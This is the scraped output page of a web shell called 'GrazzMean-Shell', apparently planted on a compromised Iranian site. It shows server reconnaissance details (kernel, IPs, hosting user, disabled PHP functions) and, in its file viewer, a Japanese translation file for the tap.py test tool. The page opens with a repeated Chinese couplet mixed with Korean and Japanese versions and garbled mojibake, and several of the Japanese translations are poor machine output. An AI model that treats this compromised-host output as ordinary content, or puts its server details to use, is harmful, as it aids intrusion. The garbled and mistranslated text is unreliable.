曾与蒿藜同雨露,한때 잡초와 쑥과 함께 비와 이슬을 나누던 곳이 이제는 소나무와 삼나무와 함께 서리와 눈을 견뎌내고 있다.终随松柏到冰霜.かつては雑草やヨモギと共に雨や露を分かち合っていたが、今では松やヒノキと共に霜や雪に耐えている。曾与蒿藜同雨露,Once sharing rain and dew with weeds and wormwood, now enduring frost and snow with pines and cypresses.终随松柏到冰霜.曾与蒿藜同雨露한때 잡초와 쑥과 함께 비와 이슬을 나누던 곳이 이제는 소나무와 삼나무와 함께 서리와 눈을 견뎌내고 있다.,终随松柏到冰霜.譖セ荳手珍阯懷酔髮ィ髴イ�檎サ磯囂譚セ譟丞芦蜀ー髴�曾与蒿藜同雨露,鏇句笌钂胯棞鍚岄洦闇诧紝缁堥殢鏉炬煆鍒板啺闇�终随松柏到冰霜.曾与蒿藜同雨露,한때 잡초와 쑥과 함께 비와 이슬을 나누던 곳이 이제는 소나무와 삼나무와 함께 서리와 눈을 견뎌내고 있다.终随松柏到冰霜.曾与蒿藜同雨露,终随松柏到冰霜. rahbord-ins.ir - GrazzMean-Shell
Uname: Linux server18.dn-server.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
Software: LiteSpeed
PHP version: 7.4.33 [ PHP INFO ] PHP os: Linux
Server Ip: 185.126.202.122
Your Ip: 216.73.216.193
User: rahbordf (4876) | Group: rahbordf (4881)
Safe Mode: OFF
Disable Function:
show_source, system, shell_exec, passthru, exec, popen, proc_open

name : tappy.po
# Translations template for tap.py.
# Copyright (C) 2015 Matt Layman
# This file is distributed under the same license as the tap.py project.
# 
# Translators:
# Matt Layman <matthewlayman@gmail.com>, 2015
msgid ""
msgstr ""
"Project-Id-Version: tappy\n"
"Report-Msgid-Bugs-To: EMAIL@ADDRESS\n"
"POT-Creation-Date: 2015-11-26 09:08-0500\n"
"PO-Revision-Date: 2015-11-27 19:20+0000\n"
"Last-Translator: Matt Layman <matthewlayman@gmail.com>\n"
"Language-Team: Japanese (http://www.transifex.com/tappy/tappy/language/ja/)\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"Generated-By: Babel 2.0\n"
"Language: ja\n"
"Plural-Forms: nplurals=1; plural=0;\n"

#: tap/main.py:32
msgid "A TAP consumer for Python"
msgstr "Python用のTAP消費者"

#: tap/main.py:33
msgid ""
"When no files are given or a dash (-) is used for the file name, tappy will "
"read a TAP stream from STDIN."
msgstr "ファイルを指定しないか、ダッシュをすると( - )のファイル名に使用され、tappyはSTDINからのTAPストリームを読み込みます。"

#: tap/main.py:38
msgid ""
"A file containing TAP output. Any directories listed will be scanned for "
"files to include as TAP files."
msgstr "含むファイルのTAP出力。ファイルは、TAPファイルとして含まれるようにするために記載されている任意のディレクトリがスキャンされます。"

#: tap/main.py:43
msgid "use verbose messages"
msgstr "詳細メッセージを使用します"

#: tap/parser.py:106
msgid "It is an error to explicitly specify any version lower than 13."
msgstr "これは、明示的に13以外の任意のバージョンが低い指定するとエラーになります。"

#: tap/rules.py:25 tap/tests/test_loader.py:82
msgid "Multiple version lines appeared."
msgstr "複数のバージョンのラインが登場しました。"

#: tap/rules.py:27 tap/tests/test_loader.py:100
msgid "The version must be on the first line."
msgstr "バージョンは、最初の行になければなりません。"

#: tap/rules.py:32 tap/tests/test_rules.py:53
msgid "Missing a plan."
msgstr "計画がありません。"

#: tap/rules.py:36 tap/tests/test_rules.py:64
msgid "Only one plan line is permitted per file."
msgstr "唯一の計画線は、ファイルごとに許可されています。"

#: tap/rules.py:42 tap/tests/test_rules.py:44
msgid "A plan must appear at the beginning or end of the file."
msgstr "計画では、ファイルの先頭や末尾に表示される必要があります。"

#: tap/rules.py:46 tap/tests/test_rules.py:85
msgid "Expected {expected_count} tests but only {seen_count} ran."
msgstr "期待 {expected_count} テストだけ {seen_count} 走りました。"

#: tap/rules.py:70 tap/tests/test_rules.py:97
msgid "Bailed: {reason}"
msgstr "保釈:{reason}"

#: tap/rules.py:74 tap/tests/test_loader.py:50
msgid "{filename} does not exist."
msgstr "{filename} は存在しません。"

#: tap/runner.py:63
msgid "(expected failure)"
msgstr "(予想失敗)"

#: tap/runner.py:68
msgid "(unexpected success)"
msgstr "(予期せぬ成功)"

#: tap/runner.py:80 tap/plugins/_nose.py:114
msgid ""
"Bad format string: {format}\n"
"Replacement options are: {{short_description}} and {{method_name}}"
msgstr "バートフォーマット文字列: {format}\n交換オプションには、次のとおりです。{{short_description}} と {{method_name}}"

#: tap/tracker.py:138 tap/tests/test_tracker.py:19
msgid "# TAP results for {test_case}"
msgstr "以下のための#1のTAP結果 {test_case}"

#: tap/plugins/_nose.py:41 tap/plugins/_pytest.py:25
msgid "Stream TAP output instead of the default test runner output."
msgstr "代わりに、デフォルトのテストランナー出力のストリームのTAP出力。"

#: tap/plugins/_nose.py:44 tap/plugins/_pytest.py:33
msgid ""
"An optional output directory to write TAP files to. If the directory does "
"not exist, it will be created."
msgstr "オプションの出力ディレクトリは、TAPにファイルを書き込むことができます。ディレクトリが存在しない場合、それが作成されます。"

#: tap/plugins/_nose.py:49 tap/plugins/_pytest.py:31
msgid "Store all TAP test results into a combined output file."
msgstr "結合された出力ファイルにすべてのTAPテスト結果を保存してください。"

#: tap/plugins/_nose.py:52
msgid ""
"An optional format string for the TAP output. The format options are: "
"{short_description} for the short description, and {method_name} for the "
"test method name."
msgstr "TAP出力のためのオプションのフォーマット文字列。フォーマットオプションは、次のとおりです。テストメソッド名の短い説明のため{short_description}、と{method_name}。"

#: tap/plugins/_pytest.py:28
msgid "Store all TAP test results into individual files per test case."
msgstr "テストケースごとに個別のファイルにすべてのTAPテスト結果を保存してください。"
© 2026 GrazzMean-Shell